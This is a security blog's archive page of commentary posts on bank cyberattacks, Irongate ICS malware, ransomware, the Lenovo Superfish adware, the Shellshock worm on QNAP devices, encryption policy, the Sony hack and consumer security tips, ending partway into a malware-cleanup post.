Category Archives: malware

Banking on Insecurity

Posted on by
Reply

They came for the money, they stayed for the data. There is far more at stake in financial services than dollars and sense. The past twelve months have shown how far attackers are willing and able to go; banks are known for their conservative pace in adopting new strategies, and attackers are literally banking on it.

As the saying goes, “In God we trust”. In banks, maybe not so much.  According to a recent report by Capgemini, one in five bank execs are “highly confident” in their ability to detect a breach, never mind defend themselves against it.  Yet “83% of consumers believe their banks are secure from cyber attack”.  One in four banks report they’ve been attacked, but only 3% of consumers believe their bank has suffered a breach. Never mind the money. How about the data? Survey shows that 71% of banks don’t have a solid security strategy in place, nor do they have adequate data privacy practices. The numbers are not good. Only 40% of banking and insurance companies have automated security intelligence capabilities for proactive threat detection

After following the trail on the SWIFT bank heists last year, I’ve paid close attention to banking malware, threat actors, and points of failure. What worries me is what’s coming as digital payments become the norm, and digital identities take hold in developing nations who lack the infrastructure or regulation to secure or enforce. Given what we already know, what does this recent history of attacks tell us?

Polish Banks
The recent series of targeted malware attacks against Polish banks was identified in January this year, but attackers went after the data, not money. After noticing unusual network activity, like traffic to “exotic” locations and encrypted executables that nobody knew of, and unauthorised files on key machines in the network, several commercial banks confirmed malware infections. Investigations revealed infection stemmed from a tampered JS file from the webserver of the Polish financial sector regulatory body.  This was actually part of a wider campaign that has gone after financial institutions in over 30 countries.  According to researchers from both BAE Systems and Symantec, the malware used in Poland can be linked to similar attacks around the globe, and there are marked similarities to tools used by the cybercrime group Lazarus, although no confirmation has been made.  Targets were led to compromised sites of interest to them, watering holes, which were malicious sites that injected code and directed the targets to a customized exploit kit.  This kit contained exploits against known vulnerabilities in Flash Player and Silverlight. What’s interesting is that the exploits were only activated for certain visitors: those with IP addresses from specific ranges. Per Symantec, “The IP addresses belong to 104 different organizations located in 31 different countries … The vast majority of these organizations are banks, with a small number of telecoms and internet firms on the list.” 15 of these are from the US.  The infection downloaded enables recon on the compromised system. Again, this tool is similar to those used in past by the Lazarus group. Now every major security group has published their opinions and analysis on what was originally all but overlooked as some malware that spread from the regulatory body’s server.

Fileless Malware Attacks
In January of this year, there were reports around the globe of attacks on banks using fileless malware. The malware resided solely in the memory of compromised systems.  This is not signature based malware that can be referenced and detected. According to Kaspersky, 140 enterprises in 40 countries have been hit. And forensics cannot help us:

“ memory forensics is becoming critical to the analysis of malware and its functions. In these particular incidents, the attackers used every conceivable anti-forensic technique; demonstrating how no malware files are needed for the successful exfiltration of data from a network, and how the use of legitimate and open source utilities makes attribution almost impossible.” 

But the infections are hard to identify so that number could well be more.  Further complicating things is the use of legitimate and widely used sysadmin and security tools  like PowerShell, Metasploit and Mimikatz for malware injection. In a range of incidents, the common denominator seems to be embedding PowerShell in the registry to download Meterpreter. From there, the attack is carried out using the native Windows utilities and sysadmin tools. Per Kaspersky:

fileless1fileless2

The new fileless malware hitting banks is Duqu 2.0, which Kaspersky found on it corporate network in 2014, but only after it went undetected for 6 months because it lives almost completely in the memory of the computers. Duqu 2.0 is derived from Stuxnet. The malware renames itself when an infected computer is rebooted so digital forensics has a tough time finding traces. The calling card seems to be the unusual embedding of PowerShell into the registry to download Meterpreter. Duqu 2.0 is derived from Stuxnet. Reports aren’t saying how the malware spreads.

TESCO Bank Attack
In November 2016, Tesco Bank, a British retail bank chain with 7 million customers, warned its customers to watch for suspicious money withdrawals. Unfortunately, when customers who noticed money was missing from their accounts reached out to the bank, many could not get through. Approximately 20,000 accounts were hit. Tesco briefly halted online transactions in response. The attack seemed to stem from a “systemic failure of security around Tesco’s core database”. Recommendations include having controls in place to alert on changes to key files and configurations. As well, file monitoring integrity and Configuration Management Security ensure that if and when changes are made, they are valid and validated.

Take the Money and Run:  COBALT, ATMs and ‘Jackpotting’
There was a distinct rise in ATM attacks over 2016.  The latest siege, Cobalt, covers a wide swath across the UK, Spain, Russia, Romania, the Netherlands, much of Eastern Europe and Malaysia.  According to Group IB researchers, a large number of machines are attacked at once, and Cobalt appears to be linked to cybercrime syndicate Buhtrap.  The malware used causes infected machines to spit out cash in an attacks known as “jackpotting”.  Noteworthy is how this is being described as “the new model of organized crime”.  The FBI issued warnings to US banks following those ATM heists, taking into account the attacks in Taiwan and Thailand, when thieves grabbed over 260,000 pounds from Thailand’s Government savings bank and $2.5 million from Taiwan. The world’s two largest ATM manufacturers, NCR and Diebold Nixdorf, worked to manage the threat.

Lloyd’s Bank Hit by DDoS Attack
In January the venerable Lloyd’s Bank of London was struck by a DDoS attack that lasted two days.  Attackers tried to crash the Lloyd’s site, causing issues for customers and impacting some access to online banking.  The bank did not lose money, nor data, nor was the impact significant.  Law enforcement is investigating.

Attacks on Banks in the SWIFT System
Banks rely on messenger systems to conduct transfers back and forth. In 2016, a series of targeted attacks on banks in the trusted SWIFT messenger system came to light after a massive heist on the Bank of Bangladesh. Apparently the attacks are evolving, and SWIFT has told member bank, in an undisclosed letter from Nov. 2, that “attacks on its systems have only become more sophisticated in their strategies”.  “The threat is very persistent, adaptive and sophisticated – and it is here to stay”.  This is despite the work by regulators globally to toughen bank security measures. And the word is that “a fifth of them are hitting paydirt for the attackers”, per Stephen Gilderdale, head of SWIFT’s Customer Security Programme. Now the hackers exploit tech support software to gain access. Then send victims phony payment instructions via SWIFT network.  SWIFT emphasizes that all those attacks detected “exploited SWIFT interfaces used by its customers” but that the SWIFT communications network itself was not impacted. In light of this, warnings are being issued to small businesses to realize the threat to them is real.  Scams have become more sophisticated and will continue to evolve. 

Sources:

https://badcyber.com/several-polish-banks-hacked-information-stolen-by-unknown-attackers/
https://securelist.com/blog/research/77403/fileless-attacks-against-enterprise-networks/
https://www.symantec.com/connect/blogs/attackers-target-dozens-global-banks-new-malware-0
https://baesystemsai.blogspot.sk/2017/02/lazarus-watering-hole-attacks.html   https://threatpost.com/fileless-memory-based-malware-plagues-140-banks-enterprises/123652/
http://www.welivesecurity.com/2017/02/16/demystifying-targeted-malware-used-polish-banks/?utm_source=organic%20twitter&utm_medium=news&utm_campaign=WLS   http://economictimes.indiatimes.com/industry/banking/finance/banking/indian-banks-are-waking-up-to-a-new-kind-of-cyber-attack/articleshow/56575808.cms
https://www.f-secure.com/documents/996508/1030743/cyber-security-report-2017

Irongate & Customized ICS Malware: Don’t Hit the Snooze Button This time

Posted on by
Reply

icspic3

ICS or Industrial Control System networks are integral to running our critical infrastructure, industrial and manufacturing processes, hospitals.  These are specialized systems that have been kept separate or “air gapped” from main networks, but that has been changing over the past few years as everybody finds ways to get connected. However, a mindset persists that because these systems are “special” and “different”, and because they have been segregated from conventional networks for so long, they are inherently protected. This past week heralded the discovery of “Irongate”, customized malware for ICS that is still in the testing stages and has not been used against production facilities – yet. The fact that somebody has carried on from where Stuxnet left off is a warning to us all that our assumptions on what keeps us secure no longer apply.

Stuxnet showed us that specialized systems offer attackers, especially at the nation state level, a unique opportunity for this reason. Nobody is looking when they think they are secure. The fact is that attackers live within our networks for long periods. We have seen this proven in recent months through the rapid escalation of ransomware and lateral movement through networks to accumulate info and destroy data; in the attack on the power grid in the Ukraine where attackers harvested credentials to access the VPN and get into supposedly secure systems; and the SWIFT banking heists where attackers learned the most intricate details of how to manipulate printer outputs and redirect huge monetary transactions.

‘Airgaps’ are great in theory, but don’t hold up given the growing reality of the Iot and now the IIoT. With pressures to cut costs, increase productivity, and just make things easier, these systems are being connected to corporate networks and the “Cloud”. There’s a whole lot of scary here because the truth is that ICS systems are not well monitored. Experts like Chris Sistrunk and Robert M. Lee have made this pointedly clear in emphasizing the need for NSM, network system monitoring and DFiR, digital forensics, to look for what attackers leave behind.  You can’t find the danger if you aren’t looking.

While the big announcement of Irongate was this week, researchers actually found samples late 2015, and reports show that the malware can be dated as far back at 2012, and was submitted to VirusTotal through the web interface in Israel in 2014. There is no evidence of this having been used in any campaign, nor is it associated with known threat actors.  Siemens ProductCERT confirmed that “the code would not work against a standard Siemens control system environment”. As it stands, it is not proof-of-concept for an actual weapon or adversary. Yet, the code was found when searching for droppers compiled with PyInstaller; Irongate droppers are Python scripts converted to executables from that same software. Somebody saw the need to make this, and the opportunity for exploit.  We need to read into that and act on it before it moves from test to production.

According to Robert M. Lee,

“ICS is a viable target and attackers are getting smarter on how to impact ICS with ICS specific knowledge sets… The unique nature of ICS offers defenders many advantages in countering adversaries but it is not enough. You cannot rest on the fact that ‘ICS is unique’ or ‘ICS can be hard to figure out’ as a defense mechanism. It is a great vantage point for defenders but must be taken advantage of or adversaries will overcome it.”

Right now, there is a lot of speculation around why this exists in test, without a known contributor. Dan Scali, senior manager for FireEye Mandiant ICS Consulting, posits “Is someone trying this in a simulated [environment] before taking it to a production environment? Or is it a researcher saying ‘look what I can do … a Stuxnet-type thing?”

Robert M Lee expressed concern that this illustrates a fundamental security problem with ICS/SCADA. “It’s a sign of the interest in this by pen testers, security companies, as well as adversaries…I am not confident that a majority of the industry could respond to it. We don’t know what’s out there; antivirus companies aren’t finding it and even if they had, who would know what to do with it [the threat]?”

If we’re not looking, we’re not finding. And we won’t be able to prepare for attacks which are already in the works. We would be foolish to think otherwise.

This argument is made by Lior Frenkel, CEO of Waterfall Security.  He expects attacks similar to Stuxnet “are in the pipeline”.

these attacks will increase in their sophistication and complexity so any solution needs to be completely comprehensive and robust to cover the full perimeter of an ICS site … (adding that) unidirectional gateways are the optimal solution for these attacks”.

Add to that this assertion by Sean McBride, attack synthesis lead for FireEye iSIGHT Intelligence: “I would not be surprised to see sandbox evasion and file replacement attacks incorporated by future ICS malware deployed in the wild.” This is yet another wakeup call for ICS SCADA, and other sensitive segregated systems.

Irongate is

  • sophisticated,
  • has the capacity to be persistent,
  • is evasive
  • undetected by AV
  • introduces new features to existing knowledge of customized ICS malware.

The key feature is a man-in-the-middle (MitM) attack, where the malware replaces existing DLL (Dynamic Link Library) files with malicious ones, enabling it to come between a PLC and legitimate monitoring software to engineer the next step. Like a scene from a movie, where the security camera footage is manipulated, the malicious DLL records five seconds of ‘normal’ traffic from a PLC to the user interface. This “footage” goes on replay while other data gets sent back to the PLC. Hence an attacker can alter a controlled process without alerting the process operators.

Causes for concern should be:  this malware was undetected by AV, even though some strings had the word “dropper” and there was an actual module named scada.exe; the malware is evasive, and will not run if it detects the use of VMware or Cuckoo Sandbox environments – something Stuxnet could not do.

Although Irongate is not as complex, the similarities to Stuxnet stand out:

  • Both types of malware search for a single, highly specific process.
  • Both replace DLLs to manipulate processes
  • Both are evasive. IRONGATE looks for sandbox or VMware that allow observation of malware; Stuxnet sought out antivirus software.
  • Both manipulate process data. IRONGATE actively records and plays back to conceal it manipulations however.

A key difference is that unlike Stuxnet, “Irongate has no worm-like spreading function, nor any apparent ties to nation-state actors”.

Recommendations on how to secure against this latest variant of ICS malware include integrity checks and code. But it really comes down to following through on best practices and those areas already identified as weak. The problem is that what we’ve been doing will fail us going forward, and we’re failing at doing the basics right. Know your baselines and actively look for anomalies. NSM needs to happen, as does DFiR within ICS, comprehensively and without further delays and excuses. Otherwise, we are turning a blind eye to attackers who know these systems better than we do.

This latest variant of customized ICS malware may be in the testing stages as we found it. But you can bet if someone else is working on this, things have already moved toward production and deployment. Irongate is yet another major wakeup call and we can’t keep hitting the snooze button.

Resources:

https://www.fireeye.com/blog/threat-research/2016/06/irongate_ics_malware.html

https://www.helpnetsecurity.com/2016/04/13/ics-network-attacks/?utm_content=buffer3b349&utm_medium=social&utm_source=twitter.com&utm_campaign=buffer

http://www.darkreading.com/threat-intelligence/shades-of-stuxnet-spotted-in-newly-found-ics-scada-malware-/d/d-id/1325753

https://www.helpnetsecurity.com/2016/06/03/ics-focused-irongate-malware/

The Future of Ransomware

Posted on by
Reply

ransom

Ransomware is like like a nasty game of tag: you can try to avoid it but once you’re hit, you’re out. For all we know about doing defence right, following the best practices advocated by NIST and SANS, this particularly malevolent threat has been on an upward trajectory out of the gate since 2016, after trending through 2015.  It’s gone way beyond just phishing for targets and locking down individual files.  Current strains are evasive: like tag, they figure out what anti-virus and security is running on the target system that might detect it and stay hidden. They now go after websites. They lock down entire servers. And they don’t care who the victims are – not even hospitals.

Samsam-ransomware-attack-chain-768x391

If you’ve been reading along with me on Twitter, or happen to be up at 2:00 a.m. like I am, you know that ransomware is what keeps me up at night. Along with some other brilliant minds in our security community who are dedicated to tracking and shutting down this ever-growing threat. These guys really know what they’re doing. Countless hours of research, investigation and analysis have produced this paper:  Ransomware: Past, Present, and Future.   There are definitive pieces that give the lay of the land and map out the course ahead. That is what this piece does. Sincere appreciation for the efforts of  @da_667 @munin @ImmortanJo3 @wvualphasoldier (and others) who put this together. They understand just how widespread the risk is, and time is not a luxury we have. This is essential reading for anyone in tech, security, business, critical infrastructure. Essentially, anyone who needs to safeguard the data and networks their daily business relies on.

From the Talos blog: A fictional Adversary’s workflow of compromise and takeover

dadiagram

Right now, here is what I would advise anyone.  Back you stuff up, frequently, and separately from the network.  Check your patch management situation. Where are your exposures?  How are you handling security awareness, especially around phishing? Do you monitor your systems regularly, so that you have a baseline to compare events against?

And finally, take the time now and please read this: Ransomware: Past, Present and Future by Talos. Because the more people who know about ransomware and where it’s headed, the better we can all work together to secure things.

Thank you for stopping by!

Superfish and Lenovo: One Big Fish Fry

Posted on by
Reply

“Superfish” by @EddieTheYeti

There’s a nasty little game afoot where new laptops come with undesirable extras. I’m talking about “crapware” – all those annoying little programs and invitations to sign up and buy that suddenly fill your screen moments after you first boot up.  That’s not the way anyone deserves to experience those heady first moments with a major new purchase. And yet, it’s exactly what happens with nearly all new laptops and pcs.

If you ask, you’re told that it’s been in practice by big companies for a while; that it’s the way business is done; that it’s nothing to worry about.  That doesn’t make it right.  And as of today, that doesn’t make it safe.

lenovolaptopIt has been discovered that the plethora of advertising extras pre-installed on Lenovo laptops contains a hidden danger.  A piece of adware, known as “Superfish Visual Discovery”, actually conducts a type of attack known as “MiTM” or Man-in-the-Middle, where it messes with that lovely new laptop’s configuration, and actually compromises a key security component. And no, that is not supposed to happen.  Which is why I think it’s time to speak up and speak out about this practice.

Plenty of top-drawer securitytech experts are currently dissecting and revealing the ugly truth about “Superfish”.  Simply put by Marc Rogers on Marc’s Security Ramblings,:

 badcert Lenovo is installing adware that uses a “man-in-the-middle” attack to break secure connections on affected laptops in order to access sensitive data and inject advertising. As if that wasn’t bad enough they installed a weak certificate into the system in a way that means affected users cannot trust any secure connections they make – TO ANY SITE.

Rik Ferguson offers this explanation on CounterMeasures:

 Superfish also installs its own self-signed Root Certificate Authority… Superfish can generate any certificate it wants, which will be trusted by your browser as entirely legitimate, allowing it to impersonate any destination on the internet. These sites are normally protected by strong encryption for your security

twittererRob Graham on Errata Security described how he was able to “intercept the encrypted communications of SuperFish’s victims (people with Lenovo laptops)”. On Twitter, he challenged the supposition by Peter Hortensius, CTO of Lenovo, that the problem was “theoretical” by saying how he had tested and proved otherwise.  And Steve Ragan on Salted Hash Security News hits the nail on the head when he states:

Even if the user removes the Superfish software, the certificate remains trusted and installed on the system. As for the opt-in requirement, most users agree to everything when configuring a new system, assuming they even notice the Superfish TOS to begin with.

What really bothers me is that most users don’t have the technical skillsets to understand what is actually happening, let alone to diagnose and disinfect.  From my years of experience working with end users, cleaning up this kind of mess definitely  falls outside reasonable expectations of what we should ask most people to do. Helping folks overcome their fear of technology is always challenging.  Most people would just like the problem to go away. Or for someone else to fix it.  There is a point to which you can lead users, but then they balk.certs

My team and I are all about simplifying technology for users. And honestly, if you can teach someone the easy ways to do things right, like security, then it’s like teaching that proverbial man to fish: they’ll be fine for the rest of their lives. But there is nothing simple about cleaning up malware, spyware, adware and the technical mess they inflict on devices.  Nobody who really cares about their customers should be asking them to start prodding around in program or registry files even if the customer is technically qualified.  Because confusion happens and mistakes can be made.

It’s really great to hear the outcry against what’s been going, and to put the issue squarely in front of major manufacturers. Time for certain parties to take a good look in the mirror: How can you proclaim your commitment to improving security when you’re actually contributing to a key source of problems? I love this statement by Marc Rogers on Marc’s Security Ramblings :

We trust our hardware manufacturers to build products that are secure. In this current climate of rising cybercrime, if you can’t trust your hardware manufacturer you are in a very difficult position

That said, what can you do about it? First and foremost, you need to get that junk off your device.  I’m happy to report that some terrific folks have been addressing that and there are some good suggestions on how to detect and remove.  For those inclined to do take the task on, read the steps through carefully a couple of times to make sure it’s clear before you undertake anything.  I can recommend this piece by PC World.  As well, I found this piece by ZDNet a little more detailed and perhaps easier to follow.

Crapware serves no purpose other than garnering profit.  Lenovo has a PR nightmare ahead, and they have a lot to answer for. While they claim to have halted shipping it back in January, that does nothing about what’s already out there.  Hopefully this serves notice to other distributors about cleaning up their acts so they don’t get caught up in the same net with “Superfish”.   Because the only real victims in this fish fry are the end-users.

NOTE: The awesome pic up at the top is by talented InfoSec member and artist @EddieTheYeti

Security Patches: One Step Forward, Two Steps Back

Posted on by
Reply

malware

Security breaches, mass DDoS attacks, ransomware mutations. No question about it – the challenges to information security are constant and ever-changing. Over the past twelve months, InfoSec has had to deal with threats not only of a greater magnitude in complexity but also in sheer volume. So in our concerted, and at times hasty, efforts to keep up with all that’s out there, are we leaving ourselves exposed? Do we need to double-back and cover our tracks?

Fact is, there is a lot to keep up with, even for security super-heroes. Given the nature of the beast, we’re always looking forward, trying to keep up or gain a little ground to ready ourselves for the next challenge. But what about those “backdoors” we just closed?

malware3Cleaning up after mass events like ShellShock/Bashbug and Heartbleed isn’t straightforward. Sadly, one patch does not fit all when there are multiple iterations of operating systems and devices. And the truth is – there just aren’t enough good people or hours in a day to comb through all the stuff out there to find and fix what’s at risk, much as we want to. Much as we need to. What happens next is inevitable. The adversary takes advantage, finds the hole, and builds exploits that we then must find and shut down in a series of blocks and tackles.

Here’s a recent case in point: Shellshock and QNAP. Shellshock doesn’t just impact servers. It impacts devices connecting to these servers through the internet: wireless access points, routers, smart fridges, video cams, webcams, even light bulbs. You can patch a server. It’s not so easy to patch a fridge. The real challenge has been to identify and patch all those different exposed devices. QNAP makes network attached storage devices that are popular world-wide. And therefore ideal targets for Shellshock exploits.

While QNAP did issue a firmware patch in October, Shellshock worm exploits were detailed later in December. The worm targeted a particular CGI script, /cgi-bin/authLogin.cgi, which could then be accessed without authentication. That would allow attackers to launch a shell script that could in future download more malware. Essentially, keeping the backdoor open.cgi backdoor

One of the interesting things noted about this worm, per Kaspersky’s detailed write up, was that the script it made then downloaded and installed QNAP’s Shellshock patch. Yes! But in a move that was strictly territorial to keep other opportunistic attackers out.

Kaspersky advised that

“IT staff responsible for these devices security should apply patches themselves, or a worm will do it. At a price”

I’ve followed up with QNAP, and nothing else has been issued. The onus is on the users to identify and patch their products. Need I say more?

It’s easy to lose track when the tyranny of the urgent sets our agendas for us. And it’s hard to be proactive when you’re busy fighting fires. But the fact is we need to keep watching those backdoors – because they don’t always shut completely.

This post was featured on DarkMatters, the security blog by Norse Corp

The lead illustration is an actual screencapture of Shellshock malware by MalwareMustDie.org, a whitehat security research workgroup

Why Encryption Matters: Political Insecurity vs InfoSec

Posted on by
Reply

cam and bam

You own your own security. Bottom-line, when it comes down to planning how to protect yourself and what is yours, that decision should belong to you. But that’s not what President Obama, UK Prime Minister David Cameron or French Prime Minister Hollande would have you believe after their exchange of inflammatory rhetoric last week. If these three global leaders have their way, rather than securing our freedoms in the face of terrorism, they’ll be restricting the safeguards we need in place, and opening the cyber backdoor to those threats they fear most.

It appears fear fuelled knee-jerk reactions following the horrific terror attacks in France. French PM Hollande called for tighter surveillance measures to potentially weaken and cripple encryption in France. That encouraged UK Prime Minister David Cameron to say he’d like to ban certain forms of encryption, impacting popular messaging apps like iMessage and WhatsApp. You can read this post by Cory Doctorow to get a shopping list of what they want to limit http://boingboing.net/2015/01/13/what-david-cameron-just-propos.html. US President Obama’s new Internet security proviso followed hard on the heels of Cameron’s call to outlaw encryption. Instead, they want to build “backdoors” into applications, that would allow government officials to have the ability to read all media and messages, and effectively give the state far more access and control over everyone else. But as Cory so aptly points out “there’s no back door that only lets good guys go through it.”

Official White House photo by Pete Souza

Official White House photo by Pete Souza

When Obama delivers his State of The Union address on January 20th, he’s going to make his case against encryption, and against the people in InfoSec who watch our backdoors constantly, identifying and tracking down threats from around the world.  There is a lot of money being made by people who can breach security, acquire our personal data, and sell it to the highest bidder.  The stakes are much higher when it comes to securing our critical infrastructure: power, water, communications, defense.  We have clear proof that those systems have already been targeted and penetrated.  Those systems are vital to our way of life, and deserve the best protection we can offer.

Rob Graham has written an excellent response to this in his blog, Errata Security, and he levels this warning: “The most important innovators this law would affect are the cybersecurity professionals that protect the Internet. If you cared about things such as “national security” and “cyberterrorism”, then this should be your biggest fear…This creates an open-door for nation-state hackers and the real cybercriminals.” http://blog.erratasec.com/2015/01/obams-war-on-hackers.html#.VL1RgkfF_p6.

mw2

Call me crazy, but I think we should listen to those who know a lot more then the rest of us think we do. Misguided Security warns “once this Pandora’s Box is opened, it’s going to be damn hard to shut and the talented people who do great research and help protect the public from people and organizations that are truly scary”. http://misguidedsecurity.blogspot.ca/2015/01/wi-fight.html Encryption keeps data safe, keeps identities safe, whereas backdoors and uninvited surveillance create risk.

mw1

These guys aren’t the hackers – they’re the ones that protect us from them.  Yet the term is dangerously misunderstood. Rob Graham explains “Because of our knowledge, we do innocent things that look to outsiders like “hacking”. Protecting computers often means attacking them.” There’s a diligent army of highly skilled folks working on our behalf out there, scrutinizing infinite lines of code to catch what we don’t want to have. They share what they learn in real time, a collaborative, co-operative and highly effective network. Given the opportunity, we really should be listening to them.

Thanks to the folks in InfoSec and the tools they use daily, I’ve watched botnets being launched by attackers from China.  To see what is coming at us in real time just click on this link to a map by Norse  http://map.ipviking.com/

norse

tshirt

We need the freedom to innovate and explore technology so that it will serve us better. As Rob Graham points out, “Internet innovation happens by trying things first then asking for permission later. Obama’s law will change that. ”  How can we defend ourselves if we handcuff those who do? There’s currently a movement afoot within the InfoSec community to spread the word and explain the real value of encryption so that everybody understands they have a stake in this. (I admit, I may be owning one of these shirts myself).

Currently, this seems to be couched as a “tech” issue, with the political pundits throwing words around like “cyber”, “encryption” and “hacker”, terms that can easily be used in a campaign of fear-mongering by government policy makers to assume control. The assumption is that the average person will probably stop listening because they consider this out of their realm, so it doesn’t apply to them. But that couldn’t be further from the truth. This argument is not just about technology anymore. It challenges current standards of freedom and privacy, and within that, how we get to protect ourselves. And everything we hold dear. Isn’t that our decision to make?

My Top 10 List: So What Did We Learn in 2014

Posted on by
Reply

malware3

There is no question that 2014 has been a most eventful year for InfoSec – and that’s not necessarily a good thing.  Data breaches, malware attacks, compromised Point-of-Sales systems, more data breaches. And of course – the Sony hack. A lot of painful lessons have been learned, many at high cost. So as the year draws to a close, let me present my Top 10 List of what I hope we learned from this year of events we wish we could forget.

1. PATCH IT. Patch it good! System software patches are an integral part of keeping your business, and yourself, safe.  Windows, Linux, Adobe, Oracle to name a few, all offer regular patches to cover those vulnerabilities that leave them exposed to hackers looking for a way in. Ideally, you should have a regular ie monthly schedule where patches are checked and updated.  Another thing to remember: test patches before you apply them. Microsoft has had two terrible months in a row issuing then recalling bad patches, but not before inflicting some major headaches on those who already applied them.   http://www.darkreading.com/application-security/time-to-rethink-patching-strategies/a/d-id/1318256?_mc=RSS_DR_EDT&utm_source=dlvr.it&utm_medium=twitter

B5fDUybIUAMF2IG2. THINK before you click that link.  Phishing and malvertising have reached prolific levels, and are designed so well it’s easy for everyone to fall for the bait. The onus is on us to be certain we know and trust the sender before we open attachments or click on links. Visiting popular websites or social media hopping is an open invitation to a nasty case of malware because many of these destinations have now become choice phishing holes. Don’t get lured in.   http://www.esecurityplanet.com/malware/dridex-and-email-a-nasty-social-engineering-team.html

3. Pass on that Password. This is your first and your best defence to secure anything of value.  Here is how to do it right. Ideally a length of 16 characters, with a mix of upper and lower cases, including numbers and special characters. Oh – and take a tip from Sony. Don’t file under “Passwords”. http://www.wired.com/2014/09/dont-get-hacked/?linkId=9521469

4. AntiVirus Protection. There are a range of options, and many good SOHO programs are even free, though I would strongly encourage paying more to invest in additional protection against cyber threats.  And yes – you definitely need to have this on your phone & tablet. Mobile devices are targets of choice. Given how much of our lives we keep on our phones, why would you put that at risk? Finally, don’t rely on out-dated or lapsed programs. In the constantly evolving world of malware and viruses, yesterday’s solutions won’t cut it. Always keep your AV updated.hacking-sony

5. Breach Protocol 101. If you get breached, handle the situation correctly and professionally. Your customers deserve the decency of being informed as soon as possible to protect themselves and take appropriate action. As in the case of Home Depot, don’t make customers wait for the bad news. Because you can’t put a price on trust and reputation. http://www.theglobeandmail.com/report-on-business/international-business/us-business/home-depot-shares-drop-after-chain-investigates-data-breach/article20308768/?cmpid=rss1&click=sf_rob

6. Secure your SOHO tech. Especially routers. Update, upgrade.
http://blog.norsecorp.com/2014/12/18/millions-at-risk-from-misfortune-cookie-soho-router-vulnerability/?utm_content=buffer85c25&utm_medium=social&utm_source=twitter.com&utm_campaign=bufferrouter

7. WiFI Hotspots: Use with extreme caution! In this holiday season of travel and shopping, convenience may be king but letting your guard down isn’t worth it. Secure your tech first – ‘Free’ comes with a price  http://www.onguardonline.gov/articles/0014-tips-using-public-wi-fi-networks

8. Things aren’t so fantastic when you pay in plastic. This year has proven repeatedly that credit cards are not secure. But given that so much our retail and online world run on plastic, what can you do to stay safe? For starters, Always Check Your Statements. Be in charge of your accounts and know everything coming or going. Secondly, cover the keypad when you enter a PIN anywhere.  Because there really are “eyes in the skies” that are waiting for you to enter the magic number.

malware29. You get what you paid for. When you buy pirated software and 3rd party apps, you often get a free gift-with-purchase, but trust me, it’s one you don’t want. Malware, browser hijackers etc. It’s a headache to huntdown and then remove these nuisance products. You’re better off paying for the real deal.  http://www.scmagazine.com/pirated-joomla-wordpress-drupal-themes-and-plugins-contain-cryptophp-backdoor/article/385552/

10. Best for Last. HAVE A PLAN. When it happens – and it will – have a real Disaster Recovery/Business Continuity plan in place.  According to exper Dejan Kosutic, “It is the combination of people and technology that keeps a business running, not computers only, and this is exactly why the concept of business continuity has prevailed in the last couple of years.” According to CISCO, “60% of Canadian businesses either don’t have a security strategy in place, or don’t know if their current one accounts sufficiently for change and evolution to effectively meet threats.” http://www.itworldcanada.com/article/majority-of-canadian-firms-not-prepared-for-cyber-threats-cisco/100226

And on that cheery note, let me wish you all a safe and successful 2015!

What We Should Learn from Sony’s Pain

Posted on by
Reply

hacking-sonyIt is THE biggest news story. Period. And it will be a story that will live on in the telling because it wasn’t just how it happened, it was why.  The hacker attack two weeks ago on Sony was an unprecedented take-down of a global corporate giant by the Guardians of Peace (GOP), a group of cyber-terrorists operating from a small country across the globe.

By now, we all have heard the allegations against North Korea as being the power behind the hackers. North Korea is highly volatile, an unpredictable player in the current global theatre. That means their actions are more threatening. While there is no definitive proof, the code was written in Korean. Email messages have been sent from the GOP, a hacker group based in North (not South) Korea, demanding Sony take down the film ‘The Interview’ about assassinating leader Kim Jong Un. And then there’s the fact that in North Korea, a country known for austerity and deprivation, hackers are state-sponsored and treated as an elite group.

theinterview-640x236

They clearly have no problems developing a very malicious form of malware that disabled or destroyed equipment. This type of malware may have been used before. “Shamoon” as it was known then hit 30000 computers in 2012 in an attack against the oil company Saudi Aramco, and then again in an attack against South Korea in 2013. Moreover, they were able access and operate within Sony’s systems without detection for a considerable length of time.  Sony is a private corporation, but what if this had been done to a major power supplier, water regulator, or another entity considered part of the critical infrastructure. Cybercrime becomes cyber-terrorism.

The economic costs to Sony will be staggering in terms of loss: equipment, intellectual sonypictureshack-640x1136property, confidential and personal data. Never mind the decimation of employee morale and company reputation. The hackers have been contacting families at Sony, telling them they must take their side or else. The GOP got their timing right, striking just before the Christmas release peak season, and they have brought Sony to its knees.

So what do we take away from this? Back in June, North Korea promised to “mercilessly destroy” anyone associated with the film. Did Sony not see this coming? Whatever they suspected, no provisions appear to have been made. Now, it’s damage control. And here’s the first lesson going forward for us all – as details unfold, they further expose the open wound and that can be more painful than the attack itself. In Sony’s case, it’s been revealed that they kept corporate passwords in a file called ‘Passwords’. Yes, I know. While that in itself didn’t facilitate the attack, it implies that Sony was careless, inviting further unwanted speculation.
password-hackedAnd here is the second hard lesson: regardless of how good a defense companies put up against outside hacks, they’re only as good as their weakest link in the security chain which more often than not is human error. In Sony’s case, that meant the problem could have come from within, as simple as someone unwittingly opening those carefully constructed security doors to let the attackers in. For all that companies train and advise their staff, they cannot control their every move or decision. Malware has become an art form in deception, reflecting the spectrum of human weakness.

My hard look at the bottom line: Sony didn’t know how the GOP would strike, but they knew they were at risk, and who the threat was. If this attack could be attributed to state-sponsored North Korean hackers, then current concerns being expressed for the safety of our critical infrastructure need more than words and firewalls. The onus was on Sony to secure their assets, ensuring what measures they had in place were effective. If due diligence is where we can all fall short, we need to close that door or risk more events like this.

.

A Nasty Case of Krab Web

Posted on by
Reply

Computer security concept in word tag cloud on white background

It can happen to anyone. Suddenly, your computer screen is an explosion of pop-ups. You think you’ve clicked close only to have another pop-up take its place.  And then they start opening something you never agreed to. Frantically, you try to shut things down only to discover your cursor has a mind of its own. You try to Google what to do, and keep going to a site you’ve never heard of and don’t want. Welcome to the nightmare of a malware infestation.

MALWARE ATTACK! What Do I Do NOW?

screenfull1

I just spent some quality time cleaning a nasty case of Krab Web malware off a laptop. The user had no idea what the item she downloaded would come bundled with. So, let that be my first helpful lesson to you.  Unless you download directly from the source, you are getting your downloads from third party distributor. The names are common, including biggies like CNET and Softonic.  It isn’t that you can’t trust them.  It’s that even they can’t trust what’s going into the mix.  Your best bet is to forego the default installation choice and choose “custom”.  Because when you just click and agree, a couple pages will zoom past. You may think you agreed to another toolbar but you just signed on the dotted line for a dozen – no, I am so not kidding – a dozen or more annoying and even malicious programs that will take you where you do not want to go.  By this, I mean sites where they are phishing for you and downloadable remote access bogeys lurk. But that is a whole separate posting of pain for another day.

STEP 1: Identify and Destroy

